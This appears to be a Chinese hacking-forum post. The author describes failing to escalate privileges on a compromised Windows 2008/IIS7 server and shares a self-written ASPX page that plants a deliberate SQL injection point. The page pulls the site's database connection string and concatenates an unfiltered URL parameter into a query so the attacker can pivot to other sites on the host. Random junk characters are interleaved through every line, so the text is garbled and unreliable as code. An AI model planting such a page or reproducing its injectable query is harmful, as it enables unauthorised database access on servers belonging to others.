昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。. h5 w4 n' `: L. r6 Z- j
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。. a& I; r* [& D0 g
代码量不多,自己写个拉倒了。烦死了。/ {3 a E. @2 L: i- U
% r/ Y) a+ S: {& o6 _
# p. \7 `: v$ n) O<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
% ]# P& k# [9 P% h<html xmlns="http://www.w3.org/1999/xhtml">3 r9 G' b, I, x6 d5 e
<head runat="server">+ G- A, ]. Z. R/ e
<title>暗影aspx构造注射专用页面</title>( z% H* B4 C5 {/ G2 v7 y5 s& t1 e
</head>2 M# J2 J& r9 @. K9 _9 r
<body>
7 D6 d8 k/ j' u; A8 E! y& A& l9 E: c <form id="form1" runat="server"># @2 v) R4 Q$ W R5 e9 B+ j8 c u: f
<div>
$ ^! [" z8 O" v2 q7 G& c& p <script language="c#" runat="server">
T5 i. D$ B" M* D7 g
9 j4 c/ w, ]0 f( h# _: X: B+ I void page_init(object sender, EventArgs e)
x, v9 [4 K; r8 P' g/ T6 j {
" T8 Y8 ~" L, n5 b4 P
6 q. n* h, L2 H8 W System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();: Z3 K7 L! v x, b3 { \( f& s8 M
3 m7 E( Z" Q/ h" d. k
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();' p$ Y- k0 k1 G( b, h! D) \! e
conn.Open();( W! Z4 U& l5 j" L+ b4 A
6 z: J2 M z. s
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1& K/ l0 [3 L$ x, ^1 O3 N# |3 [7 d
) a0 Y; \% U1 a2 q2 K }! u System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
( o0 b ~+ N, f$ | int x = command.ExecuteNonQuery();
/ Q8 {0 ^1 @% v6 E) P0 }, r Response.Write(i+"\n");
" `1 X: {- \/ L; r: A% P3 s Response.Write(x);
7 u8 V; q5 ] h% i7 h) M! p D conn.Close();
# s$ Z1 P* V/ S: ]( W" { }" H9 r9 K/ S0 t; c% }( ~! \
8 r# F6 h+ i; X4 j1 _ </script>0 g9 ]3 J. B& w
</div>* G9 m( T/ U# N' ?: ]0 C" S$ Z7 X
</form>
. z9 I) u& {! m6 z' j* |</body>
' Z! {) f6 x. G; n' j# G2 w( z</html>
, y- Q0 c- [6 f; A |